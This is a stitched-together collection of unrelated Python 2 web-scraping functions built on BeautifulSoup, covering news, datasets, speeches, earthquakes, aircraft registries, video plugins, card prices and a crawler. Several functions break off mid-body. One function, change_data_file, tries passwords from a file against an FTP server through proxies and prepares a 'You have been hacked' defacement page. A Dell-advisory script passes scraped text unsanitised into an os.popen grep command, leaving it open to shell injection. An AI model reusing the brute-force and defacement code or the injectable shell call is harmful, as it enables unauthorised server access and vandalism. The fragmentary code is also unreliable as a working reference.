def scrape_home():
    page = requests.get(site)
    soup = BeautifulSoup(page.text)
    for anchor in soup.findAll('a', {'class': 'newsitem2'}):
        try:
            title = anchor['title']
            link = anchor['href']
            # Parse the link: pull the date and article ID out of the URL path
            dts = datetime.strptime(link[9:17], '%Y%m%d')
            articleId = link[23:32]
            if len(title) > 0:
                # Only links with a title are worth saving
                links.append(site + link)
                titles.append(title)
                storyID.append(articleId)
        except (KeyError, ValueError):
            # Anchor is missing an attribute or the date is malformed; skip it
            pass
def scrapeDataset(index):
    try:
        record = {}
        record['id'] = index
        url = baseUrl + str(index)
        record['url'] = url
        html = scraperwiki.scrape(url)
        soup = BeautifulSoup(html)
        print soup.prettify()
        content = soup.find('div', id='content')
        record['title'] = content.find('h1', {'class': 'title'}).text
        ps = content.findAll('p')
        # record['created'] = ps[0].text
        record['categories'] = ps[1].text
        # record['description'] = ps[3:len(ps)]
        table = content.find('table', {'class': 'dataset'})
        trs = table.findAll('tr')
        record['extent'] = trs[0].findAll('td')[0].text
        record['agency'] = trs[1].findAll('td')[0].text
        record['update_frequency'] = trs[2].findAll('td')[0].text
        record['date_range'] = trs[3].findAll('td')[0].text
        record['date_published'] = trs[4].findAll('td')[0].text
        record['date_of_last_revision'] = trs[5].findAll('td')[0].text
        record['license_summary'] = trs[6].findAll('td')[0].find('a')['href']
        # Remaining rows describe the available distributions
        distributions = trs[7:]
        dists = {}
        for dist in distributions:
            dists[dist.find('th').text] = dist.find('td').text
        record['distributions'] = dists
        scraperwiki.sqlite.save(unique_keys=['url'], data=[record])
    except:
        # Skip datasets that fail to parse
        pass
def getWishes(pseudo):
    lines = []
    pages = getPages(pseudo)
    if pages == 0:
        return
    for i in range(1, pages + 1):
        page = urllib2.urlopen(url + '/page-' + str(i)).read()
        soup = BeautifulSoup(page)
        for empty in soup.findAll("li", {"class": "elco-collection-item-empty d-emptyMessage"}):
            print "Aborting: there isn't a single movie in your wishlist yet :("
            return
        for wish in soup.findAll("li", {"class": "elco-collection-item"}):
            wish_json = '<li>'
            for element_title in wish.findAll("div", {"class": "elco-collection-content"}):
                exist = False
                # Prefer the original title when one is present
                for title_original in element_title.findAll('span', {'class': 'elco-original-title'}):
                    link = getLink(title_original.text.encode('utf-8'))
                    wish_json = wish_json + '<a href="' + str(link) + '">' + title_original.text.encode('utf-8') + '</a></li>'
                    lines.append(wish_json)
                    exist = True
                # Otherwise fall back to the displayed title
                for title in element_title.findAll('a', {"class": "elco-anchor"}):
                    if exist is False:
                        link = getLink(title.text.encode('utf-8'))
                        wish_json = wish_json + '<a href="' + str(link) + '">' + title.text.encode('utf-8') + '</a></li>'
                        lines.append(wish_json)
    file = open(pseudo + '.html', 'w+')
    file.write('<html><body>')
    for line in lines:
        file.write(line)
    file.write('</body></html>')
    file.close()
def scrape_article(link):
    r = requests.get(link)
    soup = BeautifulSoup(r.text)
    story_text = soup.findAll('span', {'class': 'StoryText'})
    stories.append(story_text)
    return True
def get_soup(self, geo_query_string):
    MAX_NUM_TRIES = 5
    if not geo_query_string:
        return None
    try:
        # Serve from the cache if we have already fetched this query
        return self._geo_soups[geo_query_string]
    except KeyError:
        num_tries = 0
        success = False
        getter = get_geo_page
        while num_tries < MAX_NUM_TRIES and not success:
            raw_html = getter(geo_query_string)
            soup = BeautifulSoup(raw_html)
            # Verify we got a valid page
            try:
                assert soup.find(text="Status")
                success = True
                print("Got geo page for %s" % geo_query_string)
            except AssertionError:
                print("Couldn't get page for %s. Sleeping and will try again" % geo_query_string)
                time.sleep(2)
                num_tries += 1
                getter = uncached_get_geo_page
        if not success:
            print soup.prettify()
            raise Exception("Page for %s not retrieved. Perhaps server down or no internet connection?" % geo_query_string)
        self._geo_soups[geo_query_string] = soup
        return soup
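# Usage sketch (not from the original source): one way the cached, retrying
# get_soup above might be wired into a class. GeoScraper, the stub fetchers,
# and the "GSE12345" query string are illustrative assumptions only; the real
# code presumably defines its own get_geo_page / uncached_get_geo_page.
def get_geo_page(query):           # stand-in for the real (possibly cached) fetcher
    return "<html>Status</html>"

def uncached_get_geo_page(query):  # stand-in for the cache-bypassing fetcher
    return "<html>Status</html>"

class GeoScraper(object):
    def __init__(self):
        self._geo_soups = {}       # query string -> cached BeautifulSoup object
    get_soup = get_soup            # reuse the function defined above as a method

scraper = GeoScraper()
first = scraper.get_soup("GSE12345")   # fetched (up to MAX_NUM_TRIES attempts)
second = scraper.get_soup("GSE12345")  # served straight from the cache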
def parse_speech(url):
    data = {}
    html = scraperwiki.scrape(url)
    soup = BeautifulSoup(html)
    content = soup.find('div', {'id': 'mainColumn'})
    title = content.h1.text
    author = content.find('p', {'class': 'detail'}).text[2:]
    position = content.p.nextSibling.text
    date_and_place = content.find('p', {'class': 'detail alternate'})
    date = date_and_place.text.partition(',')[0]
    place = date_and_place.text.partition(',')[2]
    # Body paragraphs: single-letter tag names with no attributes
    body = content.findAll(lambda tag: len(tag.name) == 1 and not tag.attrs)
    # Re-join the body, otherwise it shows up with array cruft in the JSON
    body = ''.join(str(tag) for tag in body)
    data['title'] = title
    data['body'] = body
    data['minister_name'] = author
    data['minister_position'] = position
    data['date'] = date
    data['where'] = place
    data['source_url'] = url
    data['department'] = 'Business, Innovation and Skills'
    print "Save: " + str(data)
    scraperwiki.sqlite.save(["title", "source_url"], data)
def scrapeyear(url, year):
    seen_before = scraperwiki.metadata.get(url)
    if seen_before is not None:
        print "Seen before - skip: " + url
        return
    print "Processing year " + year
    data = {}
    html = scraperwiki.scrape(url)
    soup = BeautifulSoup(html)
    table = soup.find('table', {'id': 'mot-tafla'})
    trs = table.findAll('tr')
    for row in trs[1:]:
        items = row.findAll('td')
        slod = 'http://www.ksi.is/mot/motalisti/' + items[1].a['href']
        motanumer = re.sub('http:\//www.ksi.is\/mot\/motalisti\/urslit-stada/\?MotNumer=', '', slod)
        mot = items[1].text
        flokkur = items[3].text
        data['slod'] = slod
        data['year'] = year
        data['motanumer'] = motanumer
        data['flokkur'] = flokkur
        data['mot'] = mot
        print "Saving year " + year
        scraperwiki.datastore.save(["mot", "year"], data)
    # Mark this URL as processed so it is skipped next time
    scraperwiki.metadata.save(url, "1")
def getcontentparas(self, html, domain):
    bs = BeautifulSoup(html)
    body = []
    try:
        # Each blog uses a different container for the article body
        if domain == "engadget":
            body = bs.findAll('div', attrs={'class': 'post_body'})[0].contents
            body = body[2:len(body) - 4]
        elif domain == "mashable":
            body = bs.findAll('div', attrs={'class': 'description'})
        elif domain == "techcrunch":
            body = bs.findAll('div', attrs={'class': 'body-copy'})[0].contents
        elif domain == "huffingtonpost":
            body = bs.findAll('div', attrs={'class': 'entry_body_text'})[0].contents
            body = body[3:len(body) - 10]
        elif domain == "treehugger":
            body = bs.findAll('div', attrs={'id': 'entry-body'})[0].contents
        elif domain == "businessinsider":
            x = bs.findAll('div', attrs={'class': 'KonaBody post-content'})
            if type(x) is list:
                body = x[0].contents
                body = body[1:len(body)]
            elif x:
                body = x
            else:
                print "body not initialized"
        blogparas = self.getparas(body)
        return blogparas
    except:
        print "para not found"
        return "0"
def scrape_safn(url):
    html = scraperwiki.scrape(url)
    soup = BeautifulSoup(html)
    # Loop over every link that has class="headnews"
    frettir = soup.findAll('a', {"class": "headnews"})
def scrape_videos(self, br, htmlscraper, parser, wpPost, videoUrls):
    postList = wpPost.get_posts(10000)
    for i in range(len(videoUrls)):
        try:
            print "---------------------" + str(i) + " from " + str(len(videoUrls)) + "------------------------"
            title = htmlscraper.convert_hypen_into_space(parser.split_url(videoUrls[i]))
            print "title: " + htmlscraper.uppercase_first_letter_from_string(title)
            if self.dataHandler.is_this_item_on_the_list(title, postList):
                print "Content already posted"
            else:
                print "Video scraping started ..."
                tags = htmlscraper.convert_title_to_categories(str(title))
                soup = BeautifulSoup(br.scrap_website(videoUrls[i]))
                thumbnail = parser.get_thumbnail(soup)
                print "thumbnail: " + thumbnail
                paraVideo = parser.parse_video_id(videoUrls[i])
                iframe = parser.create_video_iframe(paraVideo[0], paraVideo[1])
                print "iframe: " + iframe
                video_duration = parser.get_duration(soup)
                print "video duration: " + video_duration
                embedurl = htmlscraper.parse_src_from_video_iframe(iframe)
                print "embedurl: " + embedurl
                duration_for_snippets = parser.prepare_duration_for_snippets(video_duration)
                print "duration for snippets: " + duration_for_snippets
                print "Wordpress post creator starting ..."
                wpPost.createPost(title, thumbnail, iframe, video_duration, duration_for_snippets, tags, embedurl)
                print "Scraped video [OK]"
        except:
            pass
def getDescription(url):
    sizeToReturn = 200
    request = urllib2.Request(url)
    # Pretend to be a regular browser (see http://whatsmyuseragent.com/)
    request.add_header('User-Agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4')
    opener = urllib2.build_opener()
    feeddata = opener.open(request).read()  # raw HTML of the page
    opener.close()
    soup = BeautifulSoup(feeddata)
    paras = soup.findAll('p')
    i = 0
    text = ''
    # Skip the first three text nodes, then collect the rest of the paragraph text
    for pa in paras:
        for res in pa.findAll(text=True):
            if i > 2:
                text = text + res
            i = i + 1
    textToReturn = text.replace('\n', ' ')
    # Pad with spaces so the result is always exactly sizeToReturn characters
    if len(textToReturn) < sizeToReturn:
        textToReturn = textToReturn + ' ' * (sizeToReturn - len(textToReturn))
    return textToReturn[0:sizeToReturn]
def getTVTree(url):
    data = common.getURL(url)
    # Strip <script> and <style> blocks before parsing
    scripts = re.compile(r'<script.*?script>', re.DOTALL)
    data = scripts.sub('', data)
    style = re.compile(r'<style.*?style>', re.DOTALL)
    data = style.sub('', data)
    tree = BeautifulSoup(data, convertEntities=BeautifulSoup.HTML_ENTITIES)
    atf = tree.find(attrs={'id': 'atfResults'})
    if atf is None:
        print tree.prettify()
        return False
    atf = atf.findAll('div', recursive=False)
    try:
        btf = tree.find(attrs={'id': 'btfResults'}).findAll('div', recursive=False)
        atf.extend(btf)
        del btf
    except:
        print 'AMAZON: No btf found'
    nextpage = tree.find(attrs={'title': 'Next page', 'id': 'pagnNextLink', 'class': 'pagnNext'})
    del data
    return atf, nextpage
def read_manga(params):
    link = 'http://manga24.ru/%s' % params['m_path']
    print link
    http = GET(link)
    if http is None:
        return False
    beautifulSoup = BeautifulSoup(http)
    body = str(beautifulSoup).split('\n')
    d_f = None
    i_f = None
    # Match image filenames ending in .png or .jpg (case-insensitive)
    pat = re.compile(r'[a-zA-Z0-9\-_.!]+\.(?:png|jpg)', re.I)
    for line in body:
        if line.split(':')[0].find('dir') > 0 and not d_f:
            url = line.split('"')[1].replace('\/', '/')
            d_f = True
        if line.split(':')[0].find('images') > 0 and not i_f:
            img = re.findall(pat, line)
            i_f = True
            for ism in img:
                try:
                    mm = xbmcgui.ListItem(ism, addon_icon, addon_icon)
                    xbmcplugin.addDirectoryItem(hos, url + ism, mm, False)
                    print ism
                except:
                    pass
    xbmcplugin.endOfDirectory(handle=hos, succeeded=True, updateListing=False, cacheToDisc=True)
def __getStationImage(self):
    img = None
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor)
    soup = None
    print "Connecting to " + self.url
    try:
        response = opener.open(self.url)
        data = response.read()
        soup = BeautifulSoup(data)
        print "Connection OK"
    except urllib2.HTTPError:
        print "ERROR in connection"
    if soup:
        img = str(soup)
        try:
            # Pull the foto=...&lenguaje parameter out of the page and build the image URL
            img = re.findall('[fF]oto\=.+\&\;lenguaje', img)[0]
            img = re.sub('([fF]oto\=\s?|\&\;lenguaje)', '', img)
            img = 'http://www.ingurumena.ejgv.euskadi.net' + urllib.quote(img)
        except IndexError:
            img = None
    return img
def query_chaoscards(card_number):
    result = {}
    card_number = card_number.replace("_", ":").replace("-", ":")
    print card_number
    url = 'http://www.chaoscards.co.uk/rss/1/productlistings_rss/c84:' + card_number
    page = urllib2.urlopen(url).read()
    soup = BeautifulSoup(page)
    item = soup.find('item')
    if not hasattr(item, 'guid'):
        return
    # Follow the product link from the RSS item to the product page
    url = item.guid.contents[0]
    page = urllib2.urlopen(url).read()
    soup = BeautifulSoup(page)
    price = soup.find(id='price_break_1').span.span.span.contents[0]
    r = price_regex.search(str(price))
    price = r.groups()[0]
    result = {
        'card_number': card_number,
        'card_name': soup.find(id='product_title').contents[0],
        'price': price
    }
    return result
def query_koolkingdoms(card_number):
    result = {}
    url = 'http://www.koolkingdom.co.uk/acatalog/info_' + card_number + '.html'
    try:
        try:
            # Attempt to fetch the page with the standard URL
            page = urllib2.urlopen(url).read()
        except urllib2.HTTPError:
            # On failure, try the alternative URL form
            page = urllib2.urlopen(url.replace("_", "-")).read()
    except urllib2.HTTPError:
        print card_number + " could not be found"
        return result
    soup = BeautifulSoup(page)
    card_name = soup.title.string
    price = soup.find('actinic:prices').span
    r = price_regex.search(str(price))
    price = r.groups()[0]
    result = {
        'card_number': card_number,
        'card_name': card_name,
        'price': price
    }
    return result
def google_backlinks(domain):
    try:
        logger.info("begin google_backlinks for domain %s" % domain)
        import urllib
        import urllib2
        from BeautifulSoup import BeautifulSoup
        # From http://stackoverflow.com/questions/802134/changing-user-agent-on-urllib2-urlopen
        keyword = '"{0}" -site:{1}'.format(domain, domain)
        url = "https://www.google.com/search?q=%s" % urllib.quote_plus(keyword)
        logger.info(url)
        headers = {'User-Agent': 'Mozilla/5.0'}
        req = urllib2.Request(url, None, headers)
        html = urllib2.urlopen(req).read()
        soup = BeautifulSoup(html)
        result = soup.find("div", {"id": "resultStats"}).string
        logger.info("Results %s" % result)
        if result:
            if result == '1 result':
                return 1
            # Strip "About ... results" down to the bare number
            result = result.lower().replace("about ", "")
            result = result.replace(" results", "")
            result = result.replace(',', '')
        else:
            result = 0
        logger.info("google_backlinks domain %s results %s" % (domain, result))
        return result
    except Exception, e:
        logger.error(e)
        return -1
def httpParse(tempname):
    """Parse http or https links in the downloaded webpage."""
    the_page = open('temp/' + tempname, 'r').read()
    soup = BeautifulSoup(the_page)
    all_links = []
    temp_links = []
    # TODO: add images or other links apart from href?
    # TODO: this saves all links, local and http/https - need to parse
    for anchor in soup.findAll('a', href=True):
        # Use unicode to make links non-navigable
        link = unicode(anchor['href'])
        all_links.append(link)
        split_link = link.split("/")
        # External links start with http:// or https://; keep their hostnames
        if 'http' in split_link[0]:
            temp_links.append(split_link[2])
    # Deduplicate the external hostnames
    link_set = list(set(temp_links))
    return all_links, link_set
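# Usage sketch (not from the original corpus): httpParse expects a page that
# was previously saved under temp/<name>. The 'example.html' filename and the
# printed summary below are illustrative assumptions.
if __name__ == '__main__':
    all_links, external_hosts = httpParse('example.html')
    print "%d links found, %d distinct external hosts" % (len(all_links), len(external_hosts))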
def processEpisodes(url):
    data = common.getURL(url)
    # Strip <script> blocks and HTML comments before decoding the JSON payload
    remove = re.compile('<script.*?script>', re.DOTALL)
    data = re.sub(remove, '', data)
    remove = re.compile('<\\!--.*?-->', re.DOTALL)
    data = re.sub(remove, '', data)
    htmldata = demjson.decode(data)['display']
    remove = re.compile('"<div.*?div>"')
    htmldata = re.sub(remove, '""', htmldata)
    tree = BeautifulSoup(htmldata, convertEntities=BeautifulSoup.HTML_ENTITIES)
    print tree.prettify()
    episodes = tree.findAll('div', attrs={'class': re.compile('video-image-wrapper video')})
    if len(episodes) == 0:
        return False
    for episode in episodes:
        print episode.prettify()
        url = episode.find('a')['href']
        name = episode.find('img')['title']
        thumb = episode.find('img')['src']
        u = sys.argv[0]
        u += '?url="' + urllib.quote_plus(url) + '"'
        u += '&mode="lifetime"'
        u += '&sitemode="playepisode"'
        infoLabels = {"Title": name, "TVShowTitle": common.args.name}
        common.addVideo(u, name, thumb, infoLabels=infoLabels)
    return True
def scrape_skjalfta(url):
    html = scraperwiki.scrape(url)
    soup = BeautifulSoup(html)
    table = soup.find('table', {'width': '80%'})
    rows = table.findAll('tr')
    for tr in rows:
        quake = {}
        date = tr.findNext('td')
        date_store = re.sub(" \d+:\d+", "", date.text)
        date_time = date.text
        time = re.sub("\d+-\d+-\d+ ", "", date.text)
        location = date.findNext('td')
        lat = location.text[:4]
        lng = location.text[5:]
        latlng = [lat, lng]
        latlng_float = map(float, latlng)
        size = location.findNext('td')
        distance = size.findNext('td')
        landmark = distance.findNext('td')
        quake['date'] = date_store
        quake['time'] = time
        quake['date_time'] = date_time
        quake['lat'] = lat
        quake['lng'] = lng
        quake['size'] = size.text
        quake['distance'] = distance.text
        quake['landmark'] = landmark.text
        print quake
        scraperwiki.datastore.save(["date_time"], quake, latlng=(latlng_float))
def play():
    smilurl = common.args.url
    swfUrl = 'http://www.bravotv.com/_tp/pdk/swf/flvPlayer.swf'
    if common.settings['enableproxy'] == 'true':
        proxy = True
    else:
        proxy = False
    data = common.getURL(smilurl, proxy=proxy)
    tree = BeautifulSoup(data, convertEntities=BeautifulSoup.HTML_ENTITIES)
    print tree.prettify()
    rtmpbase = tree.find('meta')
    if rtmpbase:
        rtmpbase = rtmpbase['base']
        items = tree.find('switch').findAll('video')
        hbitrate = -1
        sbitrate = int(common.settings['quality']) * 1024
        # Pick the highest bitrate that does not exceed the configured quality
        for item in items:
            bitrate = int(item['system-bitrate'])
            if bitrate > hbitrate and bitrate <= sbitrate:
                hbitrate = bitrate
                playpath = item['src']
                if '.mp4' in playpath:
                    playpath = 'mp4:' + playpath
                else:
                    playpath = playpath.replace('.flv', '')
                finalurl = rtmpbase + ' playpath=' + playpath + " swfurl=" + swfUrl + " swfvfy=true"
    else:
        items = tree.find('switch').findAll('video')
        hbitrate = -1
        sbitrate = int(common.settings['quality']) * 1024
        for item in items:
            bitrate = int(item['system-bitrate'])
            if bitrate > hbitrate and bitrate <= sbitrate:
                hbitrate = bitrate
                finalurl = item['src']
    item = xbmcgui.ListItem(path=finalurl)
    xbmcplugin.setResolvedUrl(pluginhandle, True, item)
def addSection(link, title):
    if not 'http' in link:
        page = urllib2.urlopen('http://www.paulgraham.com/' + link).read()
        soup = BeautifulSoup(page)
    else:
        page = urllib2.urlopen(link).read()
    section = ez_epub.Section()
    try:
        section.title = title
        print section.title
        if not 'http' in link:
            font = str(soup.findAll('table', {'width': '455'})[0].findAll('font')[0])
            if (not 'Get funded by' in font and not 'Watch how this essay was' in font
                    and not 'Like to build things?' in font and not len(font) < 100):
                content = font
            else:
                content = ''
            for par in soup.findAll('table', {'width': '455'})[0].findAll('p'):
                content += str(par)
            for p in content.split("<br /><br />"):
                section.text.append(genshi.core.Markup(p))
            # Exception for "Subject: Airbnb"
            for pre in soup.findAll('pre'):
                section.text.append(genshi.core.Markup(pre))
        else:
            for p in str(page).replace("\n", "<br />").split("<br /><br />"):
                section.text.append(genshi.core.Markup(p))
    except:
        pass
    return section
def send_sms(toMobileNo, textMsg):
    token = open_main_and_get_token()
    post_props, form = open_send_sms_url(token)
    mob_no_param = get_mob_no_param(form)
    token_param = get_token_param(form)
    post_props[mob_no_param] = toMobileNo
    post_props[token_param] = token
    post_props['textArea'] = textMsg
    post_props['nrc'] = 'nrc'
    post_props['wasup'] = 'push358'
    post_props['HiddenAction'] = 'instantsms'
    post_props['chkall'] = 'instantsms'
    post_data = urllib.urlencode(post_props)
    if _DEBUG:
        print 'Generated Post Props:'
        print post_props
        print 'Generated Post_data:'
        print post_data
    fp = URL_OPENER.open(WAY_TO_SMS_SEND_SMS_POST_URL, post_data)
    if _DEBUG:
        soup = BeautifulSoup(fp.read())
        print soup.prettify()
    print '\tSMS chunk sent!'
def play():
    smilurl = common.args.url  # +'&manifest=m3u'
    swfUrl = 'http://www.syfy.com/_utils/video/codebase/pdk/swf/flvPlayer.swf'
    if common.settings['enableproxy'] == 'true':
        proxy = True
    else:
        proxy = False
    data = common.getURL(smilurl, proxy=proxy)
    tree = BeautifulSoup(data, convertEntities=BeautifulSoup.HTML_ENTITIES)
    print tree.prettify()
    rtmpbase = tree.find('meta')
    if rtmpbase:
        rtmpbase = rtmpbase['base']
        items = tree.find('switch').findAll('video')
        hbitrate = -1
        sbitrate = int(common.settings['quality']) * 1024
        # Pick the highest bitrate that does not exceed the configured quality
        for item in items:
            bitrate = int(item['system-bitrate'])
            if bitrate > hbitrate and bitrate <= sbitrate:
                hbitrate = bitrate
                playpath = item['src']
                if '.mp4' in playpath:
                    playpath = 'mp4:' + playpath
                else:
                    playpath = playpath.replace('.flv', '')
                finalurl = rtmpbase + ' playpath=' + playpath + " swfurl=" + swfUrl + " swfvfy=true"
    else:
        # No RTMP base: fall back to the m3u8 manifest
        data = common.getURL(smilurl + '&manifest=m3u', proxy=proxy)
        tree = BeautifulSoup(data, convertEntities=BeautifulSoup.HTML_ENTITIES)
        print tree.prettify()
        items = tree.find('seq').findAll('video')
        item = items[0]
        hbitrate = -1
        sbitrate = int(common.settings['quality']) * 1024
        m3u8url = item['src']
        origfilename = m3u8url.split('/')[-1]
        data = common.getURL(m3u8url, proxy=proxy)
        # Pick the highest-bandwidth variant that does not exceed the configured quality
        items = re.compile('BANDWIDTH=(\d*).*\n(.*)(\n)').findall(data)
        for item in items:
            bitrate = int(item[0])
            if bitrate > hbitrate and bitrate <= sbitrate:
                hbitrate = bitrate
                filename = item[1]
                finalurl = m3u8url.replace(origfilename, filename)
    item = xbmcgui.ListItem(path=finalurl)
    xbmcplugin.setResolvedUrl(pluginhandle, True, item)
def summary(self):
    self.infolist.sort(key=lambda generalinfo: generalinfo.contestrank)
    now = datetime.datetime.now()
    otherStyleTime = now.strftime("%Y-%m-%d")
    timestring = time.asctime()
    file = open('Summary@' + otherStyleTime + '.html', 'w')
    filecopy = open('Summary.html', 'w')
    body = ''
    head = '''
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html" charset="utf-8">
    <title>Board|Contest Rating System</title>
    <link rel="stylesheet" href="board.css" type="text/css" />
    </head>
    <body>
    <div class="container">
    '''
    tail = '<div class="footer"><p>Generated At : ' + timestring + '</p></div></body></html>'
    title = '<h1> NWPU Team Contest @ ' + otherStyleTime + '</h1>'
    tablehead = '''
    <table id="crsboard">
    <thead>
    <th> Rank </th>
    <th> Nickname </th>
    <th> TeamName </th>
    <th> Member </th>
    <th> New Rating </th>
    <th> Old Rating </th>
    <th> Change </th>
    </thead>'''
    cnt = 1
    for i in self.infolist:
        cnt += 1
        # Alternate the row class so adjacent rows get different styling
        if cnt % 2 == 0:
            body += '<tr class="row1">' + '\n'
            body += self.rankcolor(i.contestrank)
            body += '<th> ' + str(i.nickname) + ' </th>\n'
            body += '<th> ' + i.realname.decode('utf-8') + ' </th>\n'
            body += self.numcolor(int(i.newrating)) + '\n'
            body += self.numcolor(int(i.oldrating)) + '\n'
            body += self.posneg(int(i.newrating - i.oldrating)) + '\n'
            body += '</tr>' + '\n'
        else:
            body += '<tr class="row2">' + '\n'
            body += self.rankcolor(i.contestrank)
            body += '<th> ' + str(i.nickname) + ' </th>' + '\n'
            body += '<th> ' + i.realname + ' </th>' + '\n'
            body += self.numcolor(int(i.newrating)) + '\n'
            body += self.numcolor(int(i.oldrating)) + '\n'
            body += self.posneg(int(i.newrating - i.oldrating)) + '\n'
            body += '</tr>' + '\n'
    htmlraw = head + title + tablehead + body + tail
    htmlcode = BeautifulSoup(htmlraw)
    file.write(htmlcode.prettify())
    filecopy.write(htmlcode.prettify())
def change_data_file(self, login_to_server, ip, file_name, ): self.login_to_server = login_to_server # self.pas_for_ftp = pas_for_ftp self.ip = ip self.file_name = file_name file = "pasw.txt" br = Anon(useragent, proxies) pf = open(file, 'r') #open a password file for line in pf.readlines(): pas_for_ftp = line.strip('\r').strip('\n') try: print "login_to_server - ", self.login_to_server # print "pas_for_ftp - ", self.pas_for_ftp print "IP - ", self.ip print "file_name - ", self.file_name url = "ftp://" + self.login_to_server + ":" + pas_for_ftp + "@" + self.ip + "/" print url url2 = url + self.file_name print url2 response = br.open(url2) soup = BeautifulSoup(response.get_data()) b = soup.prettify() tag = soup.body tag.clear() soup = BeautifulSoup("<body></body>") original_tag = soup.body new_tag = soup.new_tag("p") original_tag.append(new_tag) tag = soup.p tag.string = "You have been hacked" a = soup.prettify() print "File on server: ", b print "File's change: ", a request = Request(url2, data=b) request.get_host() request.get_data() print "Done!" break # response = br.open(url2) # html = br.response().get_data().replace("</b>", "< /b>") # response = mechanize.make_response(html, [("Content-Type", "text/html")], url2 , 200, "OK") # br.set_response(response) # html = br.response().get_data().replace(b, a) # response = mechanize.make_response(html, [("Content-Type", "text/html")], url2 , 200, "OK") # br.set_response(response) # html2 = br.request().get_data().replace(b, a) # mechanize.request_host(html2) except: print "[*]password", pas_for_ftp, "is incorrect"
def _fix_document(self, doc, use_soup=False):
    if use_soup:
        # Round-trip through BeautifulSoup to normalise the markup
        soup = BeautifulSoup(doc)
        doc = unicode(soup)
    else:
        doc = tidy(doc)
    return doc
def process_response(self, request, response):
    if 'text/html' in response['Content-Type']:
        soup = BeautifulSoup(response.content)
        try:
            response.content = soup.prettify(spacesPerLevel=4)
        except TypeError, e:
            # Not alanjds' flavor of Soup, so fall back to the official
            # BeautifulSoup prettify() signature.
            response.content = soup.prettify()
    return response
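# Hedged sketch (not from the original source): a process_response hook like
# the one above is normally a method on an old-style Django middleware class
# listed in MIDDLEWARE_CLASSES. The PrettifyHTMLMiddleware name and the
# settings path below are illustrative assumptions.
class PrettifyHTMLMiddleware(object):
    process_response = process_response  # reuse the method defined above

# settings.py (pre-Django-1.10 style middleware registration):
# MIDDLEWARE_CLASSES = (
#     'myapp.middleware.PrettifyHTMLMiddleware',
# )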
def scrape_aircraft(url):
    aircraft = {}
    html = scraperwiki.scrape(url)
    soup = BeautifulSoup(html)
    # Replace <br> tags with ", " so multi-line cells flatten nicely
    for br in soup.findAll('br'):
        br.replaceWith(', ')
    # First table: registration
    table = soup.find('table', {'class': 'craft'})
    registration_id = table.findNext('tr')
    aircraft['registration_id'] = re.sub("Einkennisstafir:", "", registration_id.text)
    registration_nr = registration_id.findNext('tr')
    aircraft['registration_nr'] = re.sub('Skr\xe1ningarn\xfamer:', "", registration_nr.text)
    registration_id = re.sub("Einkennisstafir:", "", registration_id.text)
    # Second table: make, production year, serial number
    table = table.findNext('table', {'class': 'craft'})
    make = table.findNext('tr')
    aircraft['make'] = re.sub("Tegund:", "", make.text)
    production_year = make.findNext('tr')
    aircraft['production_year'] = re.sub("Framlei\xf0slu\xe1r:", "", production_year.text)
    serial_nr = production_year.findNext('tr')
    aircraft['serial_nr'] = re.sub("Ra\xf0n\xfamer:", "", serial_nr.text)
    # Third table: max weight and passenger count
    table = table.findNext('table', {'class': 'craft'})
    max_weight = table.findNext('tr')
    aircraft['max_weight'] = re.sub("H\xe1marks\xfeungi:", "", max_weight.text)
    passenger_nr = max_weight.findNext('tr')
    passenger_nr = re.sub('Far\xfeegafj\xf6ldi:', "", passenger_nr.text)
    if passenger_nr == u"Ekki skr\xe1\xf0ur":  # "not registered"
        passenger_nr = "n/a"
    aircraft['passenger_nr'] = passenger_nr
    # Fourth table: owner
    table = table.findNext('table', {'class': 'craft'})
    owner = table.findNext('tr')
    aircraft['owner'] = re.sub("Eigandi:", "", owner.text)
    address = owner.findNext('tr')
    address = address.findNext('td')
    address = address.findNext('td')
    aircraft['owner_address'] = address.text
    # Fifth table: operator
    table = table.findNext('table', {'class': 'craft'})
    operator = table.findNext('tr')
    aircraft['operator'] = re.sub("Umr\xe1\xf0andi:", "", operator.text)
    address = operator.findNext('tr')
    address = address.findNext('td')
    address = address.findNext('td')
    aircraft['operator_address'] = address.text
    scraperwiki.datastore.save(["registration_id"], aircraft)
    scraperwiki.metadata.save(url, '1')
    print aircraft
def scrape_test_center_next_page(url):
    html = scraperwiki.scrape(url)
    soup = BeautifulSoup(html)
    div = soup.find('div', 'formtext first')
    links = div.findAll('a')
    for a in links:
        url = 'http://www.dft.gov.uk/dsa/' + a['href']
        scrape_test_center(url)
import urllib2, os
from BeautifulSoup import BeautifulSoup

page = urllib2.urlopen(
    'http://www.dell.com/support/article/de/de/debsdt1/sln308587/microprocessor-side-channel-vulnerabilities-cve-2017-5715-cve-2017-5753-cve-2017-5754-impact-on-dell-products?lang=en#Dell_Products_Affected'
).read()
soup = BeautifulSoup(page)
for row in soup.findAll('table')[1].findAll('tbody')[0].findAll('tr'):
    name = row.findAll('td')[0].text
    new_version = row.findAll('td')[1].text
    try:
        # Look the product up in README.md to get the version we already track
        line = os.popen("grep '%s' README.md" % name).read()
        old_version = line.split(" | ")[1].replace(" ", "").replace("\n", "")
        try:
            status = line.split(" | ")[3].split(" ")[0]
        except IndexError:
            status = "no"
        if status == "no":
            if old_version != new_version and new_version != "In Process":
                new_version_link = row.findAll('td')[1].findAll('a')[0]
                page_version = urllib2.urlopen('http:%s' % new_version_link['href']).read()
                soup_version = BeautifulSoup(page_version)
def getLinks(i, limit):
    global j
    global visitedHash
    global JuLiDoTheThing
    global GlobalDictForWordFreq
    last = False
    while i < limit:
        TempDictForWordFreq = dict()
        # Write results to disk every 500 documents
        if i % 500 == 0 and i != 0:
            print "Hit a multiple of 500 documents - writing to file."
            writeToFile(last)
        # This try/except lets the crawl keep going (and still write output)
        # even if the queue is empty or a link cannot be opened.
        # TODO: make sure an empty queue cannot turn into an infinite loop.
        try:
            # Get the next URL on the queue
            url = linksQ.dequeue()
        except:
            print "The queue is empty."
            writeToFile(last)
            return
        if delay:
            t0 = time.time()
            slowDown()
        try:
            html = urllib.urlopen(url).read()
            soup = BeautifulSoup(html)
        except:
            print "Could not open the URL:", url
            last = True
            continue
        # If we have visited the URL before, do not process it a second time
        if visitedHash.get(url, False) != False:
            i += 1
            print "Already visited " + str(i), url
            continue
        # New URL: collect its links and tokens
        else:
            for link in soup.findAll('a'):
                # Get the target of each anchor on the page
                newLink = link.get('href')
                if newLink != None:
                    # Absolute URL
                    if len(newLink) > 7 and (re.match(r"http\:\/\/", newLink[0:7]) or re.match(r"https\:\/\/", newLink[0:8])):
